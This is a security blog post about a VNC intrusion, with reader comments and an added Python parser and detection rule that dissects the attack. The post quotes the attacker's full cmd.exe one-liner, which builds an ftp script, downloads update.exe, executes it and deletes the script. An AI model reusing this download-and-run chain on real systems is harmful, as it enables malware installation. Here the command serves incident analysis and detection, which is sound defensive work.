The Lazy Genius

Security News & Brain Dumps from Xavier Ashe, a Bit9 Client Partner


Anyone seen this?

Posted by Xavier Ashe on June 5, 2007

I've got a bastion host that had vnc wide open. I just got a connection. It fired a ctrl-alt-del, opened a task manager, and ran cmd.exe. It then executed the following command. I was able to get a screen shot before the window disappeared, but it looked like the command was not successful. The attacker disconnected immediately. I have no extra users, but am downloading Helix right now to see if anything really happened. I also have a pcap. But does this look familiar to anyone?

cmd /c net set 21 >> ij &echo user ingenieurisiv aiisiv >> ij &echo binary >> ij &echo get update.exe >> ij &echo bye >> ij &ftp -n -v -s:ij &del ij &update.exe &net start SharedAccess &exit
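The one-liner quoted above, parsed from the defender's side, as an added example that is not part of the original post or its comments. It splits the cmd.exe chain on `&`, rebuilds the ftp script that the `echo ... >> ij` redirects assemble, and summarizes the download-then-run pattern (script-driven ftp.exe, the fetched file executed, the script deleted, a service started) in a form a detection rule can consume. The sample input is the command line copied from the post; `analyze_cmdline`, `matches_download_and_run` and the benign sample are this example's own.

```python
import re

# Constructed sample for this example: the command line quoted in the post, copied verbatim.
OBSERVED_CMDLINE = (
    "cmd /c net set 21 >> ij &echo user ingenieurisiv aiisiv >> ij "
    "&echo binary >> ij &echo get update.exe >> ij &echo bye >> ij "
    "&ftp -n -v -s:ij &del ij &update.exe &net start SharedAccess &exit"
)
# Constructed benign chain, used to check that the rule does not fire on ordinary redirects.
BENIGN_CMDLINE = "cmd /c dir >> out.txt &type out.txt"

ECHO_REDIRECT = re.compile(r"^echo\s+(.*?)\s*>>?\s*(\S+)$", re.IGNORECASE)
FTP_SCRIPT_FLAG = re.compile(r"(?:^|\s)-s:(\S+)", re.IGNORECASE)


def split_cmd_chain(cmdline):
    """Split a cmd.exe one-liner into its chained simple commands.

    Handles the unconditional '&' seen in the sample as well as '&&' and '||'.
    Quoting is not modelled (assumption: inputs are unquoted, as in the sample).
    """
    body = re.sub(r"^cmd(?:\.exe)?\s+/c\s+", "", cmdline, flags=re.IGNORECASE)
    return [p.strip() for p in re.split(r"\s*(?:&&|\|\||&)\s*", body) if p.strip()]


def reconstruct_echo_files(commands):
    """Rebuild files the chain assembles with 'echo <text> >> <file>'.

    Returns {filename: [line, ...]} in append order. Only echo redirects are
    reconstructed: 'net set 21 >> ij' is not an echo, so whatever net.exe wrote
    is not represented (the comments below the post discuss that line).
    """
    files = {}
    for cmd in commands:
        m = ECHO_REDIRECT.match(cmd)
        if m:
            files.setdefault(m.group(2).lower(), []).append(m.group(1))
    return files


def analyze_cmdline(cmdline):
    """Summarize the script-driven ftp download-and-run pattern in one chain."""
    commands = split_cmd_chain(cmdline)
    files = reconstruct_echo_files(commands)
    report = {
        "commands": commands, "echo_files": files, "ftp_script": None,
        "ftp_script_has_open": None, "downloads": [], "executed_downloads": [],
        "script_deleted": False, "services_started": [], "findings": [],
    }
    for cmd in commands:
        tokens = cmd.split()
        head = tokens[0].lower()
        if head == "ftp":
            m = FTP_SCRIPT_FLAG.search(cmd)
            if m:
                name = m.group(1).lower()
                report["ftp_script"] = name
                report["findings"].append(f"ftp.exe driven by script file '{name}'")
                lines = files.get(name, [])
                if lines:
                    report["findings"].append("ftp script assembled with echo redirects in the same chain")
                words = [l.split() for l in lines if l.split()]
                report["ftp_script_has_open"] = any(w[0].lower() == "open" for w in words)
                report["downloads"] = [w[1] for w in words if w[0].lower() == "get" and len(w) > 1]
                if not report["ftp_script_has_open"]:
                    # ftp -n disables auto-login; with no 'open <host>' line the
                    # 'user' and 'get' commands run without a connection.
                    report["findings"].append("ftp script has no 'open <host>' line; commands issued unconnected")
        elif head == "del" and len(tokens) > 1 and tokens[1].lower() == report["ftp_script"]:
            report["script_deleted"] = True
            report["findings"].append("ftp script deleted after use")
        elif head == "net" and len(tokens) > 2 and tokens[1].lower() == "start":
            # SharedAccess is the service name of Windows Firewall / Internet
            # Connection Sharing on Windows XP.
            report["services_started"].append(tokens[2])
        elif head in {d.lower() for d in report["downloads"]}:
            report["executed_downloads"].append(tokens[0])
            report["findings"].append(f"downloaded file '{tokens[0]}' executed in the same chain")
    return report


def matches_download_and_run(report):
    """Rule: ftp.exe driven by a script built in the same chain, and a fetched file executed."""
    script = report["ftp_script"]
    return bool(script and report["echo_files"].get(script) and report["executed_downloads"])


if __name__ == "__main__":
    for finding in analyze_cmdline(OBSERVED_CMDLINE)["findings"]:
        print(finding)
```

Running it on the observed chain reports the rebuilt script (`user ...`, `binary`, `get update.exe`, `bye`) with no `open` line, which is consistent with the post's observation that the command did not appear to succeed; the rule fires on the observed chain and stays quiet on the benign one.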

No Responses Yet to “Anyone seen this?”

  1. Anonymous said

    Are you sure the first part is correct? “net set 21 >> ij” does not make any sense, I would expect him to specify the ftp host there.


  2. Anonymous said

    Yeah… we have a screen shot of the attack. It looks like a buggy bot to me. NET SET is not a valid command on XP, and I don't think it's a valid command on any OS.


  3. Anonymous said

    Hi –
    I had something similar happen:

